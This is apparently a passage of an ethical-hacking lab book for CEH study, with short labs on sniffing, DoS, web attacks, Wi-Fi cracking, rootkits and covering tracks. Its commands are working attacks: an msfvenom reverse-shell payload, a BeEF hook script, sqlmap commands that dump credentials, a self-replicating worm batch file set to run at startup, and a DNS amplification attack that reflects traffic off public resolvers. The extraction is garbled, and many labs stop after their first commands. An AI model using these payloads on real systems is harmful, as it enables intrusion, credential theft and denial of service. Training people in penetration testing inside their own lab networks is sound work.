Lab Walk-Through:
To start our attack, type:
ettercap -G
Lab Objective:
Learn how to perform ARP poisoning.
Lab Purpose:
ARP, meaning Address Resolution Protocol,
is a protocol responsible for making a
connection between a device’s MAC and IP
addresses.
Lab Tool:
Ettercap.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
By poisoning ARP tables we’re able to trick
devices on a network thinking we are
something we’re not, for example the
network’s default gateway. We need a
specific target for this lab, which will be our
Windows 7 VM, and we need to enable IP
forwarding on our Kali box, with the
command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Lab Objective:
Learn how to perform MAC spoofing.
Lab Purpose:
In one of our previous labs, we’ve looked at
MAC flooding, and we’ve mentioned that
MAC addresses, while intended to be sort of
a fingerprint for a NIC, can be changed. In
this lab, we’ll see just how easy it is to do so.
Lab Tool:
MACChanger.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Changing a MAC address in Kali is actually
quite trivial, seeing how there is a tool that
can do it for us, aptly called MACChanger.
As before, let’s type:
macchanger --help
Lab Objective:
Learn how to perform DNS poisoning.
Lab Purpose:
DNS (Domain Name System) poisoning, also
known as DNS cache spoofing/poisoning, is
an attack in which we pretend to be a DNS
server, connecting domain names with IP
addresses.
Lab Tool:
Ettercap.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
To start things off, let’s do the following:
ifconfig
arp
route
vi /etc/ettercap/etter.dns
and enter the URL you want to spoof and
your Kali’s IP address like this:
ettercap -G
Lab Objective:
Consolidate knowledge on sniffing attacks.
Lab Purpose:
In this lab, we’re going to put our skills to use
and sniff traffic from unsuspecting victims by
performing a MITM attack.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
So, the attacks we’ve shown pertaining to
sniffing and MITM are MAC flooding,
DHCP starvation and setting up a rogue
DHCP server, ARP poisoning, MAC
spoofing and DNS poisoning. Remember
how we’ve said that you ought to be trying
the simplest methods first and add complexity
only if necessary? In addition to that, we’ve
mentioned that some of these attacks work
best if there is a dedicated hardware
component towards which said attacks can be
directed (such as a switch to use MAC
flooding on). With that in mind, we’ll show
what we can within the constraints of a
simple home networked VM lab.
Lab Objective:
Learn how to perform social engineering
attacks.
Lab Purpose:
Finally, in this lab, we’ll look into what social
engineering is and how to facilitate social
engineering attacks. This will also allow us to
build on top of the previous lab and be able to
serve a near indistinguishable copy of a
website to our targets.
Lab Tool:
SEToolkit.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
First, let’s ensure we have the tool of choice
installed with the commands:
apt update
apt install set
setoolkit
You’ll be presented with categories of attacks
and, for the purpose of this lab, we’ll opt for
1 → 2 → 3 → 2.
192.168.77.128
https://www.facebook.com/
Lab Objective:
Learn how to perform Denial of Service
(DoS) attacks.
Lab Purpose:
We’ll look into how to perform a DoS attack,
which can be helpful if your client wants to
know how resilient their infrastructure is and
how well implemented the defensive measure
is against this type of attack.
Lab Tool:
Hping3.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
The tool we’ll be using is called Hping3, so
let’s look at its help menu with the command:
hping3 --help
Lab Objective:
Learn about the SlowLoris DoS attack.
Lab Purpose:
SlowLoris is a DoS attack targeting web
applications. It works by slowly “browsing” a
target web application, thus occupying
resources and preventing legitimate users
from accessing the desired application.
Lab Tool:
SlowLoris.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
To facilitate this attack, we have to download
one of the many SlowLoris scripts from the
internet. Always be careful when running
public exploits, as they may contain hidden
code with devastating consequences for you
or your clients. That is why we shall utilize a
SlowLoris script with only a handful lines of
code, which makes it easier to analyze. So,
grab the script from
https://gist.github.com/gkbrk/5de70f35e69343718431
and make the file you save it to executable:
vi slowloris.py
Lab Objective:
Learn how to perform DoS attacks using
Windows tools.
Lab Purpose:
We’ll use this opportunity to look at two DoS
tools designed to be run on Windows
machines. Because these are notorious tools,
we’ll have to make some adjustments to our
lab network.
Lab Tool:
LOIC/HOIC.
Lab Topology:
You can use Windows 7 and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So first, we want to download the two tools
from these URLs:
https://sourceforge.net/projects/loic/.
https://sourceforge.net/projects/high-orbit-
ion-cannon/.
Lab Objective:
Learn how to perform Cross-Site Scripting
(XSS) attacks.
Lab Purpose:
This is the first of many labs where we’ll
cover web application vulnerabilities and
exploits. We’ll start things off with XSS, one
of the most prevalent bugs in modern web
apps.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
Fire up your Kali and OWASP VMs, identify
OWASP’s IP address then navigate to it
using a web browser of your choice within
Kali. You will be presented with a selection
of web applications, and we want the Damn
Vulnerable Web Application (DVWA).
Lab Objective:
Learn how to identify and exploit Cross-Site
Request Forgery vulnerabilities.
Lab Purpose:
CSRF is another injection vulnerability. The
main difference between XSS and CSRF is
who/what we are targeting. In XSS, we abuse
a client’s trust towards a server, whereas in
CSRF, we exploit a server’s trust towards a
client/user.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
Do everything the same as in the previous lab
only; instead of selecting XSS reflected,
select CSRF. Most commonly, CSRF attacks
allow us to perform an action on the
vulnerable website as a particular user (the
user we’ve used the attack against). So, for
instance, we can issue bank transactions on
behalf of a user, change their password
without their knowledge, and more. Now, the
process of exploiting a CSRF vulnerability is
more involved than XSS. If you possess
knowledge of HTML, JS and PHP, you can
perform source code reviews by clicking on
View Source in the bottom right corner of
DVWA’s window.
From there, you can see that the CSRF form
simply checks whether the two password
entries match and then sends it on its way
without any other verification and
sanitization.
If you do not, however, proceed with the next
steps.
Navigating to http://localhost:80/csrf.html
with your web browser opens up the
following page:
Lab Objective:
Learn how to perform session hijacking
attacks.
Lab Purpose:
Session hijacking is stealing another user’s
session, so let’s see how we can do that with
our DVWA target.
Lab Tool:
BurpSuite.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So, start everything as before with regards to
OWASP BWA and DVWA (make sure it is a
fresh system boot) and start BurpSuite. Log
in to DVWA and, after logging in, turn on
FoxyProxy, then intercept a DVWA request
(can be directed anywhere on the page).
Lab Objective:
Putting the session attacks knowledge to use.
Lab Purpose:
In this lab, we’ll look at how we can perform
session attacks on a remote machine and reap
the fruits of our labor within Kali.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux, Windows 7 and
OWASP BWA in a VM for this lab.
Lab Walk-Through:
We’ll be needing three machines for this lab,
one to serve as a . . . server (OWASP), one as
the client whose session we want to
compromise (Windows), and one as us, the
hacker (Kali). This won’t require much of a
setup but rather a change in our payloads
used to achieve exploitation. So, for starters,
simply boot up all three machines and
identify IP addresses. On Kali, open the
terminal, and on Windows, a web browser of
your choice.
Lab Objective:
Learn how to perform directory traversal
attacks.
Lab Purpose:
Directory traversal, also called file inclusion,
are vulnerabilities that allow us access to
otherwise hidden files. There are two types of
directory traversal/file inclusion: local (LFI)
and remote (RFI), which allow us to read
local or run remote files on the target,
respectively.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
To check out this vulnerability, head over to
DVWA and then its File Inclusion page. The
instructions are conveniently presented to us
on the page itself, so all we have to do here is
edit the ?page= parameter value.
Lab Objective:
Learn how to perform phishing attacks.
Lab Purpose:
In this lab, we’ll look into performing
phishing attacks, which is sending unsolicited
emails to target individuals or organizations
with various purposes.
Lab Tool:
SET.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Phishing emails can be used for all sorts of
things. For instance, if we’ve identified a
vulnerable version of, let’s say Adobe
Reader, we can send them a PDF file with
some malicious payload embedded into it.
We can also have them click on a link that
will direct them to a mirrored website so we
can harvest their credentials and much more.
then select 1 → 5 → 1.
Enter your target email address (something
you have control over, like your own,
alternate email) and, depending on what you
have access to, either select 1 (if you want to
use Gmail) or 2 (if you have your own
server). For the purpose of this lab, I’ll select
1.
Lab Objective:
Consolidate knowledge on web server
attacks.
Lab Purpose:
While this lab might be similar to one of our
previous ones, we’re going to introduce some
attacks in new contexts and further expand
upon what our options may be when we are
attacking a web server.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So, let’s do things from the beginning, which
is the information gathering phase. We will
iterate through several Nmap commands like
this:
nmap -Pn -p- -sS -T4 --reason -vvv 192.168.77.156
nmap -Pn -p 80,443,8080 -sV -T4 --reason -vvv
192.168.77.156
nmap -Pn -p 80,8080 -A -T4 --reason -vvv
192.168.77.156
nmap -Pn -p 80,8080 --scripts safe,discovery,vuln,exploit
--reason -vvv 192.168.77.156
Lab Objective:
Learn how to perform authorization attacks
on web applications.
Lab Purpose:
Authorization sounds similar to
authentication, and while authentication is
concerned with whether your credentials are
correct and are properly validated,
authorization is concerned with whether you
have the privileges needed to access as
particular resource.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
We’ve already talked about directory
traversal vulnerabilities, which is a kind of
authorization attack. Still, CEH tries to
differentiate between server and application
attacks, and LFI/RFI allows us to access files
we should not be able to but which are a part
of the server OS’s file system. What we’ll try
to demonstrate here is accessing files that are
a part of the application.
Lab Objective:
Learn how to attack web application logic.
Lab Purpose:
Pretty much all web applications have some
logic behind them; they operate in certain
ways with the intent of performing certain
functions. If we can abuse this “logic” of an
application, we can subvert its functionality
and make it do unintended things.
Lab Tool:
BurpSuite.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
For the purpose of this lab, we’ll look at
OWAS BWA’s Security Shepherd, as it has
some really neat application logic flaws. So,
head over to
http://192.168.77.156/shepherd/login.jsp and
input admin/password as credentials. It might
ask you to input a new password in order to
replace the default one, so input anything you
like. Then go to Challenges → Poor Data
Validation 1.
So, the challenge asks of us to buy “trolls” for
free (the troll meme face). In order to do this,
we have to proxify our requests to BurpSuite:
burpsuite
Lab Objective:
Learn how to utilize BeEF for XSS.
Lab Purpose:
BeEF is Browser Exploitation Framework
and helps us achieve greater functionality for
our XSS exploits. Not only that, but it also
simplifies things quite a bit for us.
Lab Tool:
BeEF.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Let’s make sure the tool is installed, up to
date and run it:
apt update
apt install beef-xss
vi /usr/share/beef-xss/config.yaml
Lab Objective:
Consolidate knowledge on web application
attacks.
Lab Purpose:
We’ve done a consolidation lab on web
servers, and now it’s time to do the same with
web applications. We’ll try to show some
additional differences between web server
and application attacks.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
As before, with web servers we will start
things off with information gathering. A
really neat addon that I’m using on Firefox is
called Wappalyzer, so let’s check it out.
<script
src=”http://192.168.77.128:3000/hook.js”>
</script>
Lab Objective:
Learn how to perform SQL injections.
Lab Purpose:
SQL injection (SQLi) is, as the name implies,
an injection vulnerability similar to XSS.
However, here we are not targeting the web
application but rather the server (or more
precisely, the database on the server).
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
We’ll return to Metasploitable for the SQLi
labs. Head over to its DVWA instance, then
select SQL Injection page. Click on View
Help to see the challenge for this exercise.
Lab Objective:
Learn how to perform blind SQLi.
Lab Purpose:
Blind SQLi happens when the information
you are getting back is not enough to make
informed decisions; instead, you have to
come up with tricks to figure things out.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Head over to Metasploitable DVWA’s SQL
Injection (Blind) page and click on View
Help to see the challenge for this exercise,
which is to uncover user passwords. It is not
necessary to view the source because
knowing what it does won’t change the fact
that we have to work without any server
feedback.
Lab Objective:
Learn how to perform SQLi using SQLMap.
Lab Purpose:
SQLMap is incredibly powerful to use for
SQLi. However, we wanted to explain first
what SQLi is and how things work “under the
hood,” so that you can get a better
understanding of the vulnerability. In addition
to that, using such as SQLMap is simply not
possible all the time.
Lab Tool:
SQLMap.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
The fastest and easiest way to run SQLMap
would be through BurpSuite, so let’s see how
that works. Start Burp and proxify traffic
from Metasploitable’s DVWA:
burpsuite
sqlmap -u
‘http://192.168.77.139:80/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit’ --
cookie=’security=low;PHPSESSID=1946aa8cacf96ab1b098164466e2edcd
--dbms=mysql -D dvwa –tables
sqlmap -u
‘http://192.168.77.139:80/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit’ --
cookie=’security=low;PHPSESSID=1946aa8cacf96ab1b098164466e2edcd
--dbms=mysql -D dvwa -T users –columns
sqlmap -u
‘http://192.168.77.139:80/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit’ --
cookie=’security=low;PHPSESSID=1946aa8cacf96ab1b098164466e2edcd
--dbms=mysql -D dvwa -T users -C
user,password,user_id –dump
Lab Objective:
Consolidate knowledge on SQLi.
Lab Purpose:
It’s time to look back on the things we’ve
learned in the last couple of labs when it
comes to SQLi.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
So, the first type of SQLi that we’ve looked
at is a simple, basic SQLi, easy to identify
because, when we input something like:
‘
“
‘-’
‘ or ‘1’=’1
Lab Objective:
Learn how to perform Wi-Fi hacking.
Lab Purpose:
Wi-Fi hacking is another useful skill to have,
especially if you are working on-
site/internally. Here we’ll look at techniques
to hack different types of Wi-Fi passwords.
You’ll be needing a wireless adapter that
supports monitor mode for this lab. I have
Alfa AWUS1900, and it works fine. Most, if
not all, Alfa cards should do the trick.
Lab Tool:
Aircrack-ng.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Back when I started studying to become an
ethical hacker, every course included WEP
(Wired Equivalent Privacy) hacking.
However, because it’s severely outdated and
practically non-existent in the real world,
which extends to the fact I do not have a
router that supports it, we’re only going to
look at WPA hacking. We’ll be using a suite
called Aircrack-ng, which includes several
tools, and the first of many is going to be:
apt update
apt install aircrack-ng seclists
ifconfig
airmon-ng check kill
airmon-ng start wlan0
Lab Objective:
Learn how to perform sniffing of a wireless
network.
Lab Purpose:
We’ve used Wireshark a couple of times
already in our previous labs, but this time it
will be the main tool we’ll be working with.
There is some neat functionality within it,
and, like Nmap, it should be a staple tool in
every ethical hacker’s toolbelt.
Lab Tool:
Wireshark.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We can do this in several ways, for example,
by creating an evil twin wireless AP, or we
can connect to the target network and then
perform ARP or MAC poisoning/flooding.
An evil twin is an AP that has the same
settings as the authentic one, only with a
stronger power to entice devices to connect to
it rather than the original. The evil twin
would allow us to sniff traffic from all
devices connected to it, while the poisoning
attack will only allow us to sniff traffic from
one specific target. We’ll go the flooding
route as it is easier to set up.
Lab Objective:
Learn about hashes.
Lab Purpose:
In this lab, we’ll look at hashes, what they
are, their purpose and how to identify them.
Lab Tool:
Hash-identifier.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We’ve already worked with hashes in our
password cracking labs. At that point in time,
we did not dig deeper into the topic because
the final module of CEHv11 syllabus covers
cryptography. It’s similar to how we’ve
worked with Wireshark in the past, but the
module before this one is actually concerned
with sniffing.
Lab Objective:
Learn about various cryptography tools and
how to use them.
Lab Purpose:
In this lab, we’ll look at some cryptography
tools that you can use to encrypt and decrypt
data, or to generate SSH keys, and more.
Lab Tool:
OpenSSL & GnuPG.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
We’ll cover two tools in this lab, namely
OpenSSL and GnuPG. First, let’s make sure
both are installed on our Kali VMs:
apt update
apt install gnupg openssl
Lab Objective:
Learn how to use VeraCrypt for disk
encryption.
Lab Purpose:
While disk encryption can be achieved with
many other tools as well, VeraCrypt is an
industry’s favorite.
Lab Tool:
VeraCrypt.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
To use VeraCrypt, we first have to download
it from this URL:
https://www.veracrypt.fr/en/Downloads.html.
Once it is downloaded, navigate to the
download directory through CLI and run the
following:
dpkg -i veracrypt-1.25.9-Debian-11-amd64.deb
apt install -f
veracrypt --help
Lab Objective:
Learn how to perform monitoring of web
applications for changes.
Lab Purpose:
The final 26 labs will be concerned with more
advanced topics. They are considered
advanced for one or more of the following
reasons: complexity of setup, lack of direct or
full control over the process (such as 3rd party
hosted tools with limited capabilities unless
paid for), specific use cases (i.e., tools and
techniques you will likely not use often).
In the first one of these advanced labs, we
will touch upon the topic of monitoring web
applications for changes.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
In this lab, we’ll look at a rather neat thing
we can do as ethical hackers, but sadly it is
limited unless paid for. Still, as your career as
an ethical hacker develops, and thus your
income, you will be able to pay for tools
either out of your own pocket or, if you work
in a company, they will likely be willing to
pay the licenses for you.
Lab Objective:
Learn how to perform email header analysis.
Lab Purpose:
Another interesting technique, but one you
might not be using in every single ethical
hacking engagement (simply due to the fact
that email testing is not always within scope),
is email header analysis.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Analyzing email headers can give us
information such as a detailed log of the
network path taken by the message between
the mail sender and the mail receiver(s)
(email servers). This, in turn, can potentially
show you interesting IP addresses, user
agents (and, by extension, OS information)
and more.
Lab Objective:
Learn how to perform DLL hijacking.
Lab Purpose:
DLL hijacking is a post-exploitation
technique that requires understanding of how
native applications run on Windows OSs.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
DLLs (Dynamic Link Libraries) allow
programs/applications running on Windows
OSs to share code, which allows for more
modular applications. DLLs contain functions
within themselves that applications can “call”
and use for their own operations. These DLLs
can belong to the OS or the application itself,
in which case they ship with the application.
http://support.kaspersky.com/downloads/utils/kavremov
https://web.archive.org/web/20170804213208/https://do
Lab Objective:
Learn about rootkits.
Lab Purpose:
The term rootkit can be used to denote a
malware that hides itself upon activation or a
tool that allows us to hide previously used
malware. Either way, the point lies in the fact
that the malware becomes hidden from
system users.
Lab Tool:
bytecode77.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
The first thing we’re going to do is create a
basic malware using MSFVenom with the
command:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe
-a x64 --platform windows LHOST=192.168.77.128
LPORT=1234 -o meterpreter.exe
Lab Objective:
Learn how to utilize alternate data streams.
Lab Purpose:
Alternate data streams (ADS) are essentially
secret file “attributes” or streams of data
attached to a preexisting file. This feature
exists on NTFS file systems, hence the title of
this lab. Each file can have multiple data
streams, in which you can place text or even
other files. This is perfect for us as ethical
hackers because we should always aim to be
as stealthy as possible.
Lab Tool:
SysInternals.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
To elaborate a bit more on the topic, each file
within the NTFS file system has several
attributes, one of which is $Data. These are
hidden from plain sight and, as stated in the
Lab Purpose, a single file can have multiple
$Data attributes attached to it. Not only is this
attribute hidden from users, but they do also
not show up as occupied file space. In other
words, if you attach a 12GB file as an
alternate data stream to a 20MB base file, the
occupied space on that disk will seem to be
only 20MB.
Lab Objective:
Learn how to use Auditpol.
Lab Purpose:
Auditpol is a tool native to Windows Server
2008, Windows Vista and newer OSs. Its
main purpose is auditing policies, as the name
implies, and we will use it for information
gathering.
Lab Tool:
Auditpol.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Auditpol cannot be run remotely, so we either
need to achieve a system compromise and get
shell access or, for demonstration purposes,
we can just head over to our Windows 7 VM.
Before we do anything else head over to Start
→ Local Security Policy → Local Policies →
Security Options → Audit: Force audit policy
subcategory settings (Windows Vista or later)
to override audit policy category settings →
Local Security Settings → Enabled.
Lab Objective:
Learn how to clear your tracks using
Windows native tools.
Lab Purpose:
While this lab might not seem like anything
advanced, we feel the need to include it as
well because quite a lot of people are familiar
with the app in question and have likely used
it in the past to “clean up” their computer.
Needless to say, that same cleaning up can
actually remove evidence of our activity on a
target machine.
Lab Tool:
CCLeaner.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
First, we have to download the tool from this
URL:
https://www.ccleaner.com/ccleaner/download/standard
and onto our Windows VM, install and then
run it. Now, when we want to clear our
ethical hacking tracks, we do not want to
leave the target system devoid of any and all
logs and/or activity traces, as that would also
raise suspicion. Imagine if the system in
question was actively used by someone and
they browsed some websites, we do not want
to delete their history, only what we did, so
always be mindful of that.
Lab Objective:
Learn how to create a worm malware.
Lab Purpose:
As stated in our labs on malware, the main
difference between worms and viruses is that
worms can propagate on their own. The
reason we’ve placed this lab much later than
all the others pertaining to malware is
because it assumes some programming
knowledge on your part.
Lab Tool:
Windows 7 VM.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Create a file called Crack.txt on your
Windows box with the following contents:
@ECHO OFF
XCOPY “Crack.bat”
“%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup”
:x
MD Crack
CD Crack
XCOPY “%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup\Crack.bat”
CD Crack
GOTO x
Once done, rename the file to Crack.bat and
run it. Immediately you will see the
Windows’ CLI pop up and a ton of messages
being printed out. Stop the worm by closing
the CLI window, and let’s see what’s the
damage.
If you noticed, there is a new directory called
Crack and, if we navigate through it, we can
see that the script copied itself numerous
times, along with the newly created directory.
Needless to say, if we improve our worm, it
can easily take up system resources, and it
does that quite fast and completely on its
own, safe for us needing to start it.
Lab Objective:
Learn how to perform switch port stealing.
Lab Purpose:
Switch port stealing is another type of MITM
attack and, as the name implies, requires you
to have a switch that you can attack. Modern
home routers oftentimes act as switches, but
that is not necessarily always the case, so this
attack will be dependent on the hardware you
have access to.
Lab Tool:
ARPing.
Lab Topology:
You can use Kali Linux, Metasploitable and
OWASP BWA in a VM for this lab.
Lab Walk-Through:
Port stealing, similar to other MITM attacks,
targets a specific aspect of LANs which is
called Content Addressable Memory (CAM)
table. This table stores information on which
MAC address is connected to which port on
the switch. Because of this table, the switch
knows that, for example, a device with the
MAC address of 02:42:a0:75:76:19 is on the
switch’s physical port 1, the NIC with the
MAC address of 00:50:56:3a:6c:9c is on port
2, etc., allowing for smart transfer of data
between devices. It may seem similar to an
ARP table but remember that ARP is what
connects MAC to IP addresses. The attack
itself, though, is similar in principle, as we
will see now.
Lab Objective:
Learn how to perform IRDP spoofing.
Lab Purpose:
IRDP stands for ICMP Router Discovery
Protocol and is a routing protocol that allows
the host to discover the IP addresses of active
routers on their subnet. This means that, if
successful, we can pretend to be the router. It
is very similar to ARP poisoning, only using
a different protocol.
Lab Tool:
Irpas.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
Since Irpas is not installed on our Kali box,
we ought to do so with the commands:
arp update
arp install irpas -y
Lab Objective:
Learn how to perform TCP/IP hijacking.
Lab Purpose:
TCP/IP hijacking is a type of session
hijacking but differs from what we’ve seen
before in that we’re not compromising a web
session but rather a TCP connection’s
session. Think of a user logging into a Telnet
service on another machine. They, if Telnet is
properly configured, should supply their
credentials before gaining access to the
service. It is these types of sessions that
TCP/IP hijacking aims to compromise.
Lab Tool:
Shijack.
Lab Topology:
You can use Kali Linux, Metasploitable and
OWASP BWA in a VM for this lab.
Lab Walk-Through:
We’ll be needing three machines for this lab,
one to attack from (Kali), one that has a
Telnet server (Metasploitable) and one to
make the Telnet connection from/be the
Telnet client (OWASP BWA). The tool we’ll
be using can be downloaded from the
following URL:
https://packetstormsecurity.com/sniffers/shijack.tgz
Lab Objective:
Learn how to perform IP spoofing.
Lab Purpose:
The idea behind IP spoofing is to make a
target (server) think the packets it is receiving
are coming from another client when in fact,
they are coming from us, the attacker. This is
beneficial when the target performs
differently depending on who is interacting
with it, based on the source IP address.
Lab Tool:
Hping3.
Lab Topology:
You can use Kali Linux, Metasploitable and
Windows 7 in a VM for this lab.
Lab Walk-Through:
IP spoofing is a technique that relies on our
target accepting source routed packets.
Source routing is a specific routing process
where senders can specify the route that data
packets take through a network. To that end,
we need to discover which IP address is
trusted on the target. Since this is a lab that
we have full control over, we can safely
“assume” that Windows 7 is trusted by
Metasploitable.
Lab Objective:
Learn how to perform an RST attack.
Lab Purpose:
The RST attack is a type of DoS attack as it
resets the connection between two target
machines, a client and a server, for example.
This lab demonstrates exactly what we can do
when we absolutely must break an already
existing connection between such machines.
Lab Tool:
Hping3.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
As in the previous lab, we’ve identified the IP
addresses of all machines and have now
started Wireshark and established an SSH
connection from Kali to Metasploitable.
Then, on Wireshark, we want to filter only
those packets which go to and from our two
machines and look at the very last one.
Lab Objective:
Learn how to perform UDP hijacking.
Lab Purpose:
UDP hijacking is very similar to TCP
hijacking, with the added simplicity of UDP
being stateless and not carrying sequence
numbers. This does not diminish its
usefulness, as we can abuse UDP to gain
control over DNS or NTP communication
between a client and a server.
Lab Tool:
Scapy.
Lab Topology:
You can use Kali Linux, Windows 7 and
Metasploitable in a VM for this lab.
Lab Walk-Through:
You might wonder what good would it do to
us to gain control over DNS or NTP
communication. Well, the former can be used
as an alternative to DNS spoofing, and the
latter could, for instance, be used to “expire”
an HSTS post (if time is moved forward) or
make an expired certificate valid (if time is
moved backward). So, let’s see how we’d go
about it. First, we want to start a UDP
communication between two machines.
These can be any of the two from our entire
lab VM environment, and I’ll pick Windows
to serve as the client and Metasploitable to
serve as the server. First, we need to transfer
Netcat onto Windows with the command:
scp /usr/share/windows-resources/binaries/nc.exe
IEUser@192.168.77.155:/cygdrive/c/Users/Public/Documents
After that, we start the UDP communication:
nc -lvnup 7777
on Metasploitable and:
nc -u 192.168.77.139 777
Lab Objective:
Learn how to use Websploit.
Lab Purpose:
Websploit is a toolkit containing various
functionality, such as MITM attacks, Wi-Fi
attacks, and more.
Lab Tool:
Websploit.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
This time we’ll start things off immediately
with a sequence of commands that go from
installing to tool to running one of its attacks:
apt update
apt install websploit
websploit
help
show
Lab Objective:
Learn how to utilize packet crafting tools.
Lab Purpose:
In this lab, we’ll look at a packet crafting
tool. Akin to Hping3 the tool we’ll show here
allows us to craft nearly any packet
imaginable, but there are more steps involved
to make the tool run, so we’ve left it for the
end of our 101 Labs.
Lab Tool:
PackETH.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
First, we need to download the tool by
typing:
git clone https://github.com/jemcek/packETH
cd packETH
apt update
apt install autoconf automake libgtk2.0-dev build-
essential gtk2.0 -y
./autogen.sh
./configure
make
./packETH
Lab Objective:
Learn how to perform DNS server hijacking.
Lab Purpose:
We’ve looked at DNS cache poisoning in one
of our previous labs. This time we’ll look at a
different kind of attack targeting the same
service, DNS.
Lab Tool:
DNSChef.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
An important thing to mention is that this lab
requires that we have compromised either the
DNS server that we know our target looks up
for nameserver resolution or the target’s own
DNS server lookup/priority settings . . . or
both! So, we’ll postulate that we have
achieved such a thing by in fact doing the
necessary setup of our Windows box. First,
click the Start button and then search for
Network and Sharing Center, select your
main network connection, right-click on it an
choose Properties, then find Internet Protocol
Version 4 (TCP/IPv4), again click on
Properties and input your Kali’s IP address
into the Use the following DNS server
addresses like in the screenshot below:
Once that’s taken care of, we can proceed to
devise our attack on Kali with the following
commands:
apt update
apt install dnschef
dnschef --fakeip=192.168.77.128 --fakedomains=kali.org
–interface=0.0.0.0
service apache2 start
wireshark
Make sure you have an index.html file in the
/var/www/html directory with some unique
content. Then, from Windows, navigate to
kali.org. Immediately you will see DNSChef
doing its thing, and the Windows machine
gets redirected to your Kali’s Apache
webserver. In Wireshark, we can see the DNS
“conversation” between Windows and Kali.
You will find this attack much less noisy than
DNS cache poisoning but, as we stated at the
start of the lab, there are some prerequisites
that you might not always be able to meet.
Lab Objective:
Learn how to perform a DNS amplification
attack.
Lab Purpose:
A DNS amplification attack is a type of DoS
attack using DNS packets to overwhelm the
target. This can further be increased by
running the script we will show in this lab
from multiple machines, effectively
performing a DDoS attack.
Lab Tool:
DNSDrDoS.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
There is a script we have to download from
this URL:
https://raw.githubusercontent.com/nullsecuritynet/tools/ma
and compile it on our Kali machine. We can
achieve this with the following commands:
wget
https://raw.githubusercontent.com/nullsecuritynet/tools/master/dos/dnsdrdo
gcc dnsdrdos.c -o dnsdrdos.o -Wall -ansi
echo
‘8.8.8.8\n8.8.4.4\n9.9.9.9\n149.112.112.112\n208.67.222.222\n208.67.220
wireshark
./dnsdrdos.o -f DNSlist.txt -s 192.168.77.155 -l 1000000
After running the script for only a handful of
seconds, we can see in Wireshark that we
were able to generate over 200000 packets.
This is likely to overwhelm home devices,
and a DDoS attack like this can even
overwhelm some home servers. What’s great
about this is that we’ve hidden ourselves
behind legitimate DNS servers, and the more
IPs you input into the DNSlist.txt file, the
better. Needless to say, it is still illegal to do
something like this and highly unethical, so
please refrain from doing so unless DoS
attacks are specifically requested in the
contract between you and your client.
Lab Objective:
Learn how to perform HTTP request
smuggling.
Lab Purpose:
